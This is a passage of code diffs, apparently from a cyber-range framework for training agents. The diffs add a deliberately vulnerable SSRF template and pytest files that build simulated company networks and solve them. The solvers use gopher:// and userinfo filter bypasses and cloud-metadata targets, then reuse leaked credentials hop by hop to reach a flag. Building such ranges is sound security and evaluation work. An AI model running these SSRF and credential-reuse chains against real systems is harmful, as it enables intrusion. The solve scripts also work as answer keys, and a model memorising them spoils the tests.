+        "auth_param": {{ token_param | tojson }},
+    }
+    return 200, {"Content-Type": "application/json"}, json.dumps(config).encode()

--- a/packs/cyber_webapp/cyber_webapp/vulnerabilities/templates/ssrf.py.j2
+++ b/packs/cyber_webapp/cyber_webapp/vulnerabilities/templates/ssrf.py.j2
@@ -7,10 +7,15 @@ reached depends on the backing. Under CONTAINER the internal service is a real,
 separate host on the network, so the handler fetches its metadata endpoint for
 real (``OPENRANGE_NETWORKED``). Under PROCESS the whole world shares one process,
 so it reads ``state["secrets"]["flag"]`` in place — same verdict, no socket.
+
+With ``internal_hosts`` (proxy mode), the agent drives the pivot: any internal host
+it names is fetched (path + query forwarded), so the internal estate is the agent's
+to explore — the lateral-movement chain. CONTAINER fetches it for real; PROCESS
+dispatches to the same in-process ``/svc/<host>`` route, so both grade identically.
 """
 import json
 import os
-from urllib.parse import urlparse
+from urllib.parse import parse_qs, urlparse
 
 
 def handle(query, state):
@@ -19,6 +24,37 @@ def handle(query, state):
     if not target:
         return 400, {}, b"missing url"
 
+{% if internal_hosts is defined %}
+    internal_hosts = {{ internal_hosts | tojson }}
+    parsed = urlparse(target)
+    scheme = (parsed.scheme or "").lower()
+    # The filter bypass stays the puzzle: a web scheme is blocked, so only a non-web
+    # scheme (gopher://<internal_host><path>) reaches the internal network.
+    if scheme in ("http", "https"):
+        return 403, {}, b"scheme not allowed"
+    if scheme != "gopher":
+        return 502, {}, b"unsupported scheme"
+    host = (parsed.hostname or "").lower()
+    if host not in internal_hosts:
+        # Resolves to something that isn't an internal service — nothing interesting.
+        return 200, {"Content-Type": "application/json"}, b'{"data": ""}'
+    fetch_path = parsed.path or "/"
+    if os.environ.get("OPENRANGE_NETWORKED"):
+        import urllib.request
+
+        url = "http://" + host + ":8000" + fetch_path
+        if parsed.query:
+            url += "?" + parsed.query
+        try:
+            with urllib.request.urlopen(url, timeout=5) as resp:
+                return 200, {"Content-Type": "application/json"}, resp.read()
+        except Exception as exc:  # the internal host was unreachable
+            return 502, {}, ("ssrf fetch failed: " + str(exc)).encode()
+    inner = ROUTES.get("/svc/" + host + (parsed.path or ""))
+    if inner is None:
+        return 200, {"Content-Type": "application/json"}, b'{"data": ""}'
+    return inner(parse_qs(parsed.query, keep_blank_values=True), state)
+{% else %}
     internal_host = {{ (internal_host | default("169.254.169.254")) | tojson }}
     internal_path = {{ (internal_path | default("/latest/meta-data/")) | tojson }}
     allowed_host = {{ (allowed_host | default("allowed.example.com")) | tojson }}
@@ -117,3 +153,4 @@ def handle(query, state):
     # A URL that passed the filter but points elsewhere fetches "nothing
     # interesting" — no secret, just a benign stub response.
     return 200, {"Content-Type": "application/json"}, b'{"data": ""}'
+{% endif %}

--- a/tests/test_cyber_company.py
+++ b/tests/test_cyber_company.py
@@ -1,0 +1,250 @@
+"""Company worlds (DESIGN.md §11): a believable multi-service estate the agent recons
+and pivots through. Generation + a PROCESS solve here; the docker-gated test proves the
+same recon→pivot recovers the flag across real containers."""
+
+from __future__ import annotations
+
+import json
+import shutil
+import subprocess
+import urllib.error
+import urllib.parse
+import urllib.request
+from pathlib import Path
+
+import pytest
+from cyber_webapp import NetworkedContainerWebappRuntime, WebappPack, _is_networked
+from graphschema import WorldGraph
+from openrange_pack_sdk import Backing, Snapshot
+
+from openrange.core.admit import admit
+from openrange.core.episode import EpisodeService
+
+_COMPANY_MANIFEST = {
+    "pack": {"id": "webapp"},
+    "runtime": {"tick": {"mode": "off"}},
+    "npc": [],
+    "seed": 3,
+    "company": True,
+}
+_DEFAULT_MANIFEST = {
+    "pack": {"id": "webapp"},
+    "runtime": {"tick": {"mode": "off"}},
+    "npc": [],
+    "seed": 3,
+}
+
+
+def _admit(manifest: dict) -> Snapshot:
+    snap = admit(WebappPack(), manifest=manifest, max_repairs=3)
+    assert isinstance(snap, Snapshot), snap
+    return snap
+
+
+def _public_service(graph: WorldGraph):
+    return next(
+        n for n in graph.by_kind("service") if n.attrs.get("exposure") == "public"
+    )
+
+
+def _company_exploit(graph: WorldGraph) -> tuple[str, str, str]:
+    # The public SSRF payload, built from the sampled filter the way an agent would —
+    # the same payload drives PROCESS and CONTAINER.
+    ssrf = next(
+        n for n in graph.by_kind("vulnerability") if n.attrs.get("kind") == "ssrf"
+    )
+    params = dict(ssrf.attrs.get("params", {}))
+    public_eps = {
+        e.dst
+        for svc in graph.by_kind("service")
+        if svc.attrs.get("exposure") == "public"
+        for e in graph.out_edges(svc.id, "exposes")
+    }
+    ep_id = next(
+        iter({e.dst for e in graph.out_edges(ssrf.id, "affects")} & public_eps)
+    )
+    path = str(graph.nodes[ep_id].attrs.get("path", "/"))
+    param = str(params["target_param"])
+    host = str(params["internal_host"])
+    internal_path = str(params["internal_path"])
+    if params.get("ssrf_filter") == "scheme_block":
+        payload = f"gopher://{host}{internal_path}"
+    else:  # host_allowlist (decimal_ip is swapped to it for a hostname target)
+        payload = f"http://{params.get('allowed_host', 'ok')}@{host}{internal_path}"
+    return path, param, payload
+
+
+def _get(
+    base_url: str, path: str, query: dict[str, str] | None = None
+) -> tuple[int, str]:
+    url = f"{base_url}{path}"
+    if query:
+        url += "?" + urllib.parse.urlencode(query)
+    try:
+        with urllib.request.urlopen(url, timeout=15) as resp:
+            return resp.status, resp.read().decode()
+    except urllib.error.HTTPError as exc:
+        return exc.code, exc.read().decode()
+
+
+def test_company_world_is_multi_service_and_segmented() -> None:
+    graph = _admit(_COMPANY_MANIFEST).graph
+    services = list(graph.by_kind("service"))
+    assert len(services) >= 6  # a believable estate, not the minimal pair
+
+    networks = {n.attrs.get("name"): n for n in graph.by_kind("network")}
+    assert set(networks) == {"dmz", "internal"}  # segmented, not one flat segment
+    public = _public_service(graph)
+
+    def nets_of(svc):
+        return {e.dst for e in graph.out_edges(svc.id, "connected_to")}
+
+    assert nets_of(public) == {"net_dmz"}
+    for svc in services:
+        if svc.attrs.get("exposure") != "public":
+            assert nets_of(svc) == {"net_internal"}
+
+    assert _is_networked(graph)  # routes to the per-service networked runtime
+
+
+def test_company_plants_recon_that_names_internal_hosts() -> None:
+    graph = _admit(_COMPANY_MANIFEST).graph
+    recon = next(
+        n
+        for n in graph.by_kind("vulnerability")
+        if n.attrs.get("kind") == "config_disclosure"
+    )
+    # The recon sits on the public service (the agent's only entry).
+    recon_eps = {e.dst for e in graph.out_edges(recon.id, "affects")}
+    public_eps = {e.dst for e in graph.out_edges(_public_service(graph).id, "exposes")}
+    assert recon_eps <= public_eps
+
+    internal_names = {
+        str(n.attrs.get("name"))
+        for n in graph.by_kind("service")
+        if n.attrs.get("exposure") != "public"
+    }
+    disclosed = set(recon.attrs["params"]["internal_services"])
+    assert disclosed == internal_names  # names every internal host, incl. the flag's
+
+    ssrf = next(
+        n for n in graph.by_kind("vulnerability") if n.attrs.get("kind") == "ssrf"
+    )
+    assert str(ssrf.attrs["params"]["internal_host"]) in disclosed
+
+
+def test_company_solves_on_process(tmp_path: Path) -> None:
+    snap = _admit(_COMPANY_MANIFEST)
+    graph = snap.graph
+    flag = str(graph.nodes["secret_flag"].attrs["value_ref"])
+    ssrf = next(
+        n for n in graph.by_kind("vulnerability") if n.attrs.get("kind") == "ssrf"
+    )
+    flag_host = str(ssrf.attrs["params"]["internal_host"])
+    recon = next(n for n in graph.by_kind("endpoint") if n.id.endswith("_recon"))
+    recon_url = str(recon.attrs["public_url"])
+    path, param, payload = _company_exploit(graph)
+
+    pentest = next(t for t in snap.tasks if t.meta.get("family") == "webapp.pentest")
+    svc = EpisodeService(WebappPack(), tmp_path)
+    try:
+        handle = svc.start_episode(snap, pentest.id)
+        base = str(svc.surface(handle)["base_url"])
+
+        # Recon discloses the internal estate (the flag host among them) — but not the
+        # flag itself; that still takes the pivot.
+        status, recon_body = _get(base, recon_url)
+        assert status == 200
+        assert flag_host in recon_body
+        assert flag not in recon_body
+
+        # A benign internal fetch leaks nothing; the SSRF pivot to the flag host does.
+        _, benign = _get(base, path, {param: "gopher://example.com/"})
+        assert flag not in benign
+        status, exploit = _get(base, path, {param: payload})
+        assert status == 200, exploit
+        assert flag in exploit
+    finally:
+        svc.close()
+
+
+def test_default_world_stays_one_flat_segment() -> None:
+    # The company preset is opt-in: a default world is unchanged — one network, no
+    # recon disclosure.
+    graph = _admit(_DEFAULT_MANIFEST).graph
+    networks = {n.attrs.get("name") for n in graph.by_kind("network")}
+    assert networks == {"main"}
+    kinds = {n.attrs.get("kind") for n in graph.by_kind("vulnerability")}
+    assert "config_disclosure" not in kinds
+
+
+def test_company_world_is_deterministic() -> None:
+    # Same builder + manifest + seed -> the same world, byte for byte (the recon path
+    # is sampled, so this guards it stays content-addressed).
+    a, b = _admit(_COMPANY_MANIFEST), _admit(_COMPANY_MANIFEST)
+    assert a.snapshot_id == b.snapshot_id
+
+
+def test_company_world_admits_across_seeds() -> None:
+    # The preset is robust across the seed space, not just the pinned seed: every seed
+    # yields a solvable networked company world with the recon disclosure wired. A
+    # stray vuln_kinds override cannot strip the SSRF either.
+    for seed in range(12):
+        snap = _admit({**_COMPANY_MANIFEST, "seed": seed, "vuln_kinds": {"idor": 9}})
+        kinds = {n.attrs.get("kind") for n in snap.graph.by_kind("vulnerability")}
+        assert len(list(snap.graph.by_kind("service"))) >= 6
+        assert _is_networked(snap.graph)
+        assert {"ssrf", "metadata_credential_leak", "config_disclosure"} <= kinds
+
+
+def _docker_available() -> bool:
+    if shutil.which("docker") is None:
+        return False
+    try:
+        probe = subprocess.run(
+            ["docker", "info"], capture_output=True, timeout=10, check=False
+        )
+    except Exception:  # noqa: BLE001 - any failure means "no"
+        return False
+    return probe.returncode == 0
+
+
+@pytest.mark.skipif(not _docker_available(), reason="docker engine not reachable")
+def test_company_solves_across_real_containers() -> None:
+    # The same recon→pivot recovers the flag across real per-service containers: the
+    # flag lives in an internal container the host can't address; only the SSRF pivot
+    # over the docker network reaches it.
+    snap = _admit(_COMPANY_MANIFEST)
+    graph = snap.graph
+    flag = str(graph.nodes["secret_flag"].attrs["value_ref"])
+    path, param, payload = _company_exploit(graph)
+
+    recon = next(n for n in graph.by_kind("endpoint") if n.id.endswith("_recon"))
+    internal_names = {
+        str(n.attrs.get("name"))
+        for n in graph.by_kind("service")
+        if n.attrs.get("exposure") != "public"
+    }
+
+    runtime = WebappPack().realize(graph, Backing.CONTAINER)
+    assert isinstance(runtime, NetworkedContainerWebappRuntime)
+    try:
+        runtime.reset()
+        base = str(runtime.surface()["base_url"])
+
+        # Recon works on real containers too (cross-backing parity): it discloses the
+        # internal estate but never the flag.
+        status, recon_body = _get(base, str(recon.attrs["public_url"]))
+        assert status == 200, recon_body
+        assert set(json.loads(recon_body)["upstreams"]) == internal_names
+        assert flag not in recon_body
+
+        _, benign = _get(base, path, {param: "gopher://example.com/"})
+        assert flag not in benign
+        status, exploit = _get(base, path, {param: payload})
+        assert status == 200, exploit
+        assert flag in exploit  # recovered across the container boundary
+        final = runtime.collect()
+        assert "secret_flag" in final["leaked_secret_ids"]
+    finally:
+        runtime.stop()

--- a/tests/test_cyber_company.py
+++ b/tests/test_cyber_company.py
@@ -180,6 +180,18 @@ def test_services_are_realistically_named() -> None:
         assert name in pool or name.startswith(pool[0] + "-")  # pool name or -indexed
 
 
+def test_accounts_are_real_people() -> None:
+    # Coherence (DESIGN.md §2: alice@corp.example): background accounts are real people
+    # at the company domain, not admin / user1.
+    graph = _admit(_COMPANY_MANIFEST).graph
+    accounts = list(graph.by_kind("account"))
+    assert accounts
+    for acct in accounts:
+        username = str(acct.attrs["username"])
+        assert "@" in username and "." in username.split("@")[0]
+        assert not username.startswith("user")
+
+
 def test_default_world_stays_one_flat_segment() -> None:
     # The company preset is opt-in: a default world is unchanged — one network, no
     # recon disclosure.

--- a/tests/test_cyber_company.py
+++ b/tests/test_cyber_company.py
@@ -14,7 +14,7 @@ from pathlib import Path
 
 import pytest
 from cyber_webapp import NetworkedContainerWebappRuntime, WebappPack, _is_networked
-from graphschema import WorldGraph
+from graphschema import Node, WorldGraph
 from openrange_pack_sdk import Backing, Snapshot
 
 from openrange.core.admit import admit
@@ -35,13 +35,13 @@ _DEFAULT_MANIFEST = {
 }
 
 
-def _admit(manifest: dict) -> Snapshot:
+def _admit(manifest: dict[str, object]) -> Snapshot:
     snap = admit(WebappPack(), manifest=manifest, max_repairs=3)
     assert isinstance(snap, Snapshot), snap
     return snap
 
 
-def _public_service(graph: WorldGraph):
+def _public_service(graph: WorldGraph) -> Node:
     return next(
         n for n in graph.by_kind("service") if n.attrs.get("exposure") == "public"
     )
@@ -96,7 +96,7 @@ def test_company_world_is_multi_service_and_segmented() -> None:
     assert set(networks) == {"dmz", "internal"}  # segmented, not one flat segment
     public = _public_service(graph)
 
-    def nets_of(svc):
+    def nets_of(svc: Node) -> set[str]:
         return {e.dst for e in graph.out_edges(svc.id, "connected_to")}
 
     assert nets_of(public) == {"net_dmz"}

--- a/tests/test_cyber_company.py
+++ b/tests/test_cyber_company.py
@@ -168,6 +168,18 @@ def test_company_solves_on_process(tmp_path: Path) -> None:
         svc.close()
 
 
+def test_services_are_realistically_named() -> None:
+    # Coherence (DESIGN.md §2: realism is procedural-first, from curated pools): names
+    # read like a real company estate, not the mechanical api1/db2 shape.
+    from cyber_webapp.sampling import _SERVICE_NAMES_BY_KIND
+
+    graph = _admit(_COMPANY_MANIFEST).graph
+    for svc in graph.by_kind("service"):
+        name, kind = str(svc.attrs["name"]), str(svc.attrs["kind"])
+        pool = _SERVICE_NAMES_BY_KIND[kind]
+        assert name in pool or name.startswith(pool[0] + "-")  # pool name or -indexed
+
+
 def test_default_world_stays_one_flat_segment() -> None:
     # The company preset is opt-in: a default world is unchanged — one network, no
     # recon disclosure.

--- a/tests/test_cyber_lateral.py
+++ b/tests/test_cyber_lateral.py
@@ -1,7 +1,9 @@
 """Credential-reuse lateral movement (DESIGN.md §11): the SSRF becomes an agent-driven
-internal proxy; an internal service leaks a db credential the agent reuses to open the
-internal db that gates the flag. The flag is reachable ONLY via that gate. A PROCESS
-solve here; the docker-gated test proves the same chain across real containers."""
+internal proxy, and the chain is SYNTHESIZED at a sampled depth from one composable
+primitive — an entry host leaks a credential, each gated host relays the next, the last
+serves the flag. One preset synthesizes 1-, 2-, 3-hop chains. The flag is reachable ONLY
+through the final gate. PROCESS solves here; the docker-gated test proves it on real
+containers."""
 
 from __future__ import annotations
 
@@ -20,19 +22,29 @@ from openrange_pack_sdk import Backing, Snapshot
 from openrange.core.admit import admit
 from openrange.core.episode import EpisodeService
 
-_LATERAL_MANIFEST = {
-    "pack": {"id": "webapp"},
-    "runtime": {"tick": {"mode": "off"}},
-    "npc": [],
-    "seed": 3,
-    "lateral_movement": True,
-}
+
+def _manifest(seed: int = 3) -> dict:
+    return {
+        "pack": {"id": "webapp"},
+        "runtime": {"tick": {"mode": "off"}},
+        "npc": [],
+        "seed": seed,
+        "lateral_movement": True,
+    }
 
 
-def _admit() -> Snapshot:
-    snap = admit(WebappPack(), manifest=_LATERAL_MANIFEST, max_repairs=3)
+def _admit(seed: int = 3) -> Snapshot:
+    snap = admit(WebappPack(), manifest=_manifest(seed), max_repairs=3)
     assert isinstance(snap, Snapshot), snap
     return snap
+
+
+def _chain_depth(graph: WorldGraph) -> int:
+    return sum(
+        1
+        for n in graph.by_kind("vulnerability")
+        if n.attrs.get("kind") in ("credential_gated_relay", "credential_gated_flag")
+    )
 
 
 def _ssrf_entry(graph: WorldGraph) -> tuple[str, str]:
@@ -52,7 +64,7 @@ def _ssrf_entry(graph: WorldGraph) -> tuple[str, str]:
     )
 
 
-def _metadata_host(graph: WorldGraph) -> str:
+def _entry_host(graph: WorldGraph) -> str:
     leak_ep = next(n for n in graph.by_kind("endpoint") if n.id.endswith("_credleak"))
     svc = next(
         e.src
@@ -62,56 +74,73 @@ def _metadata_host(graph: WorldGraph) -> str:
     return str(graph.nodes[svc].attrs["name"])
 
 
-def _get(base: str, path: str, query: dict[str, str] | None = None) -> tuple[int, str]:
+def _get(base: str, path: str, query: dict[str, str] | None = None) -> str:
     url = f"{base}{path}"
     if query:
         url += "?" + urllib.parse.urlencode(query)
     try:
         with urllib.request.urlopen(url, timeout=15) as resp:
-            return resp.status, resp.read().decode()
+            return resp.read().decode()
     except urllib.error.HTTPError as exc:
-        return exc.code, exc.read().decode()
+        return exc.read().decode()
 
 
-def _solve(
-    base: str, ssrf_url: str, param: str, meta_host: str
-) -> tuple[str, str, str]:
-    # Drive the chain the way an agent would; returns (leaked config body, gate-without-
-    # credential body, gate-with-credential body).
-    _, cfg_body = _get(
-        base, ssrf_url, {param: f"gopher://{meta_host}/internal/credentials"}
-    )
-    cfg = json.loads(cfg_body)
-    host, vpath, aparam, token = (
-        cfg["vault_host"],
-        cfg["vault_path"],
-        cfg["auth_param"],
-        cfg["db_token"],
-    )
-    _, no_cred = _get(base, ssrf_url, {param: f"gopher://{host}{vpath}"})
-    _, with_cred = _get(
-        base, ssrf_url, {param: f"gopher://{host}{vpath}?{aparam}={token}"}
-    )
-    return cfg_body, no_cred, with_cred
+def _follow_chain(base: str, ssrf_url: str, param: str, entry: str) -> dict:
+    # Drive the chain the way an agent would: SSRF to the entry host, then keep reusing
+    # each handed-over credential at the next host until one returns the flag. Records
+    # the entry body, the terminal body, and a no-credential probe at every gated hop.
+    entry_body = _get(base, ssrf_url, {param: f"gopher://{entry}/internal/credentials"})
+    cfg = json.loads(entry_body)
+    no_cred_bodies: list[str] = []
+    terminal_body = entry_body
+    while "vault_host" in cfg:
+        host, vpath = cfg["vault_host"], cfg["vault_path"]
+        aparam, token = cfg["auth_param"], cfg["db_token"]
+        no_cred_bodies.append(_get(base, ssrf_url, {param: f"gopher://{host}{vpath}"}))
+        terminal_body = _get(
+            base, ssrf_url, {param: f"gopher://{host}{vpath}?{aparam}={token}"}
+        )
+        try:
+            cfg = json.loads(terminal_body)
+        except json.JSONDecodeError:
+            cfg = {}
+    return {
+        "entry": entry_body,
+        "terminal": terminal_body,
+        "no_cred": no_cred_bodies,
+    }
 
 
-def test_lateral_world_wires_the_credential_chain() -> None:
+def _enables_chain_kinds(graph: WorldGraph) -> list[str]:
+    # Walk the single enables path from the ssrf and return the kinds in order.
+    by_id = {n.id: n for n in graph.by_kind("vulnerability")}
+    out = {e.src: e.dst for e in graph.edges.values() if e.kind == "enables"}
+    node = next(v.id for v in by_id.values() if v.attrs.get("kind") == "ssrf")
+    kinds: list[str] = []
+    seen: set[str] = set()
+    while node is not None and node not in seen:
+        seen.add(node)
+        kinds.append(str(by_id[node].attrs.get("kind")))
+        node = out.get(node)
+    return kinds
+
+
+def test_lateral_chain_is_synthesized_and_wired() -> None:
     graph = _admit().graph
-    kinds = {n.attrs.get("kind") for n in graph.by_kind("vulnerability")}
-    assert {"ssrf", "credential_leak", "credential_gated_flag"} <= kinds
     assert _is_networked(graph)
-
-    # The SSRF is in proxy mode (agent-driven), not the single fixed pivot.
     ssrf = next(
         n for n in graph.by_kind("vulnerability") if n.attrs.get("kind") == "ssrf"
     )
-    assert "internal_hosts" in ssrf.attrs["params"]
+    assert "internal_hosts" in ssrf.attrs["params"]  # proxy mode, agent-driven
 
-    # The chain is wired: ssrf -> credential_leak -> credential_gated_flag.
-    by_kind = {n.attrs.get("kind"): n.id for n in graph.by_kind("vulnerability")}
-    enables = {(e.src, e.dst) for e in graph.edges.values() if e.kind == "enables"}
-    assert (by_kind["ssrf"], by_kind["credential_leak"]) in enables
-    assert (by_kind["credential_leak"], by_kind["credential_gated_flag"]) in enables
+    # The enables path is ssrf -> credential_leak -> (relay ->)* -> gated_flag at the
+    # sampled depth — exactly one leak entry and one terminal flag gate.
+    kinds = _enables_chain_kinds(graph)
+    assert kinds[0] == "ssrf"
+    assert kinds[1] == "credential_leak"
+    assert kinds[-1] == "credential_gated_flag"
+    assert all(k == "credential_gated_relay" for k in kinds[2:-1])
+    assert _chain_depth(graph) == len(kinds) - 2  # relays + the terminal gate
 
     # The flag record's value is a decoy — the real flag only lives in the gated secret.
     flag = str(graph.nodes["secret_flag"].attrs["value_ref"])
@@ -123,25 +152,33 @@ def test_lateral_world_wires_the_credential_chain() -> None:
     assert record.attrs["fields"]["value"] != flag
 
 
+def test_lateral_synthesizes_varied_depth() -> None:
+    # One preset, many depths: the engine synthesizes a distribution, not a fixed shape.
+    depths = {_chain_depth(_admit(seed).graph) for seed in range(12)}
+    assert len(depths) >= 2
+    assert depths <= {1, 2, 3}
+
+
 def test_lateral_solves_on_process(tmp_path) -> None:
     snap = _admit()
     graph = snap.graph
     flag = str(graph.nodes["secret_flag"].attrs["value_ref"])
     ssrf_url, param = _ssrf_entry(graph)
-    meta_host = _metadata_host(graph)
+    entry = _entry_host(graph)
 
     pentest = next(t for t in snap.tasks if t.meta.get("family") == "webapp.pentest")
     svc = EpisodeService(WebappPack(), tmp_path)
     try:
         handle = svc.start_episode(snap, pentest.id)
         base = str(svc.surface(handle)["base_url"])
-        cfg, no_cred, with_cred = _solve(base, ssrf_url, param, meta_host)
-        assert flag not in cfg  # the metadata leaks the credential, never the flag
-        assert flag not in no_cred  # the gate denies without the reused credential
-        assert flag in with_cred  # reusing the leaked credential opens the vault
-        # The db's own default endpoint cannot leak it either — only the gate can.
-        _, db_default = _get(base, ssrf_url, {param: f"gopher://{meta_host}/records"})
-        assert flag not in db_default
+        out = _follow_chain(base, ssrf_url, param, entry)
+        assert flag not in out["entry"]  # the entry leaks a credential, never the flag
+        assert all(
+            flag not in b for b in out["no_cred"]
+        )  # every gate denies w/o the key
+        assert (
+            flag in out["terminal"]
+        )  # reusing the chain of credentials opens the vault
     finally:
         svc.close()
 
@@ -164,24 +201,25 @@ def _docker_available() -> bool:
 
 @pytest.mark.skipif(not _docker_available(), reason="docker engine not reachable")
 def test_lateral_solves_across_real_containers() -> None:
-    # The real sim-to-real target: credential reuse across real per-service containers.
-    # Each hop is a real fetch over the docker network; the flag lives in an internal
-    # container reachable only by pivoting, and only with the credential moved over.
+    # The real sim-to-real target: the credential chain reused across real per-service
+    # containers, each hop a real fetch over the docker network.
     snap = _admit()
     graph = snap.graph
     flag = str(graph.nodes["secret_flag"].attrs["value_ref"])
     ssrf_url, param = _ssrf_entry(graph)
-    meta_host = _metadata_host(graph)
+    entry = _entry_host(graph)
 
     runtime = WebappPack().realize(graph, Backing.CONTAINER)
     assert isinstance(runtime, NetworkedContainerWebappRuntime)
     try:
         runtime.reset()
         base = str(runtime.surface()["base_url"])
-        cfg, no_cred, with_cred = _solve(base, ssrf_url, param, meta_host)
-        assert flag not in cfg
-        assert flag not in no_cred
-        assert flag in with_cred  # recovered across containers via credential reuse
+        out = _follow_chain(base, ssrf_url, param, entry)
+        assert flag not in out["entry"]
+        assert all(flag not in b for b in out["no_cred"])
+        assert (
+            flag in out["terminal"]
+        )  # recovered across containers via credential reuse
         assert "secret_flag" in runtime.collect()["leaked_secret_ids"]
     finally:
         runtime.stop()

--- a/tests/test_cyber_lateral.py
+++ b/tests/test_cyber_lateral.py
@@ -13,6 +13,7 @@ import subprocess
 import urllib.error
 import urllib.parse
 import urllib.request
+from pathlib import Path
 
 import pytest
 from cyber_webapp import NetworkedContainerWebappRuntime, WebappPack, _is_networked
@@ -23,7 +24,7 @@ from openrange.core.admit import admit
 from openrange.core.episode import EpisodeService
 
 
-def _manifest(seed: int = 3) -> dict:
+def _manifest(seed: int = 3) -> dict[str, object]:
     return {
         "pack": {"id": "webapp"},
         "runtime": {"tick": {"mode": "off"}},
@@ -80,12 +81,14 @@ def _get(base: str, path: str, query: dict[str, str] | None = None) -> str:
         url += "?" + urllib.parse.urlencode(query)
     try:
         with urllib.request.urlopen(url, timeout=15) as resp:
-            return resp.read().decode()
+            return str(resp.read().decode())
     except urllib.error.HTTPError as exc:
         return exc.read().decode()
 
 
-def _follow_chain(base: str, ssrf_url: str, param: str, entry: str) -> dict:
+def _follow_chain(
+    base: str, ssrf_url: str, param: str, entry: str
+) -> dict[str, str | list[str]]:
     # Drive the chain the way an agent would: SSRF to the entry host, then keep reusing
     # each handed-over credential at the next host until one returns the flag. Records
     # the entry body, the terminal body, and a no-credential probe at every gated hop.
@@ -115,7 +118,9 @@ def _enables_chain_kinds(graph: WorldGraph) -> list[str]:
     # Walk the single enables path from the ssrf and return the kinds in order.
     by_id = {n.id: n for n in graph.by_kind("vulnerability")}
     out = {e.src: e.dst for e in graph.edges.values() if e.kind == "enables"}
-    node = next(v.id for v in by_id.values() if v.attrs.get("kind") == "ssrf")
+    node: str | None = next(
+        v.id for v in by_id.values() if v.attrs.get("kind") == "ssrf"
+    )
     kinds: list[str] = []
     seen: set[str] = set()
     while node is not None and node not in seen:
@@ -161,10 +166,11 @@ def test_lateral_chain_pivots_inward_by_tier() -> None:
     ep_of_vuln = {e.src: e.dst for e in graph.edges.values() if e.kind == "affects"}
     svc_of_ep = {e.dst: e.src for e in graph.edges.values() if e.kind == "exposes"}
     by_kind = {n.attrs.get("kind"): n.id for n in graph.by_kind("vulnerability")}
-    node = by_kind["credential_leak"]
+    node: str | None = by_kind["credential_leak"]
     tiers: list[int] = []
     while node is not None and graph.nodes.get(node) is not None:
-        svc = svc_of_ep.get(ep_of_vuln.get(node))
+        ep = ep_of_vuln.get(node)
+        svc = svc_of_ep.get(ep) if ep is not None else None
         if svc is not None:
             tiers.append(tier.get(str(graph.nodes[svc].attrs.get("kind")), 0))
         node = out.get(node)
@@ -178,7 +184,7 @@ def test_lateral_synthesizes_varied_depth() -> None:
     assert depths <= {1, 2, 3}
 
 
-def test_lateral_solves_on_process(tmp_path) -> None:
+def test_lateral_solves_on_process(tmp_path: Path) -> None:
     snap = _admit()
     graph = snap.graph
     flag = str(graph.nodes["secret_flag"].attrs["value_ref"])

--- a/tests/test_cyber_lateral.py
+++ b/tests/test_cyber_lateral.py
@@ -1,0 +1,187 @@
+"""Credential-reuse lateral movement (DESIGN.md §11): the SSRF becomes an agent-driven
+internal proxy; an internal service leaks a db credential the agent reuses to open the
+internal db that gates the flag. The flag is reachable ONLY via that gate. A PROCESS
+solve here; the docker-gated test proves the same chain across real containers."""
+
+from __future__ import annotations
+
+import json
+import shutil
+import subprocess
+import urllib.error
+import urllib.parse
+import urllib.request
+
+import pytest
+from cyber_webapp import NetworkedContainerWebappRuntime, WebappPack, _is_networked
+from graphschema import WorldGraph
+from openrange_pack_sdk import Backing, Snapshot
+
+from openrange.core.admit import admit
+from openrange.core.episode import EpisodeService
+
+_LATERAL_MANIFEST = {
+    "pack": {"id": "webapp"},
+    "runtime": {"tick": {"mode": "off"}},
+    "npc": [],
+    "seed": 3,
+    "lateral_movement": True,
+}
+
+
+def _admit() -> Snapshot:
+    snap = admit(WebappPack(), manifest=_LATERAL_MANIFEST, max_repairs=3)
+    assert isinstance(snap, Snapshot), snap
+    return snap
+
+
+def _ssrf_entry(graph: WorldGraph) -> tuple[str, str]:
+    # The public proxy-SSRF endpoint + its target param — the agent's only entry.
+    ssrf = next(
+        n for n in graph.by_kind("vulnerability") if n.attrs.get("kind") == "ssrf"
+    )
+    public_eps = {
+        e.dst
+        for svc in graph.by_kind("service")
+        if svc.attrs.get("exposure") == "public"
+        for e in graph.out_edges(svc.id, "exposes")
+    }
+    ep = next(iter({e.dst for e in graph.out_edges(ssrf.id, "affects")} & public_eps))
+    return str(graph.nodes[ep].attrs["public_url"]), str(
+        ssrf.attrs["params"]["target_param"]
+    )
+
+
+def _metadata_host(graph: WorldGraph) -> str:
+    leak_ep = next(n for n in graph.by_kind("endpoint") if n.id.endswith("_credleak"))
+    svc = next(
+        e.src
+        for e in graph.edges.values()
+        if e.kind == "exposes" and e.dst == leak_ep.id
+    )
+    return str(graph.nodes[svc].attrs["name"])
+
+
+def _get(base: str, path: str, query: dict[str, str] | None = None) -> tuple[int, str]:
+    url = f"{base}{path}"
+    if query:
+        url += "?" + urllib.parse.urlencode(query)
+    try:
+        with urllib.request.urlopen(url, timeout=15) as resp:
+            return resp.status, resp.read().decode()
+    except urllib.error.HTTPError as exc:
+        return exc.code, exc.read().decode()
+
+
+def _solve(
+    base: str, ssrf_url: str, param: str, meta_host: str
+) -> tuple[str, str, str]:
+    # Drive the chain the way an agent would; returns (leaked config body, gate-without-
+    # credential body, gate-with-credential body).
+    _, cfg_body = _get(
+        base, ssrf_url, {param: f"gopher://{meta_host}/internal/credentials"}
+    )
+    cfg = json.loads(cfg_body)
+    host, vpath, aparam, token = (
+        cfg["vault_host"],
+        cfg["vault_path"],
+        cfg["auth_param"],
+        cfg["db_token"],
+    )
+    _, no_cred = _get(base, ssrf_url, {param: f"gopher://{host}{vpath}"})
+    _, with_cred = _get(
+        base, ssrf_url, {param: f"gopher://{host}{vpath}?{aparam}={token}"}
+    )
+    return cfg_body, no_cred, with_cred
+
+
+def test_lateral_world_wires_the_credential_chain() -> None:
+    graph = _admit().graph
+    kinds = {n.attrs.get("kind") for n in graph.by_kind("vulnerability")}
+    assert {"ssrf", "credential_leak", "credential_gated_flag"} <= kinds
+    assert _is_networked(graph)
+
+    # The SSRF is in proxy mode (agent-driven), not the single fixed pivot.
+    ssrf = next(
+        n for n in graph.by_kind("vulnerability") if n.attrs.get("kind") == "ssrf"
+    )
+    assert "internal_hosts" in ssrf.attrs["params"]
+
+    # The chain is wired: ssrf -> credential_leak -> credential_gated_flag.
+    by_kind = {n.attrs.get("kind"): n.id for n in graph.by_kind("vulnerability")}
+    enables = {(e.src, e.dst) for e in graph.edges.values() if e.kind == "enables"}
+    assert (by_kind["ssrf"], by_kind["credential_leak"]) in enables
+    assert (by_kind["credential_leak"], by_kind["credential_gated_flag"]) in enables
+
+    # The flag record's value is a decoy — the real flag only lives in the gated secret.
+    flag = str(graph.nodes["secret_flag"].attrs["value_ref"])
+    record = next(
+        graph.nodes[e.src]
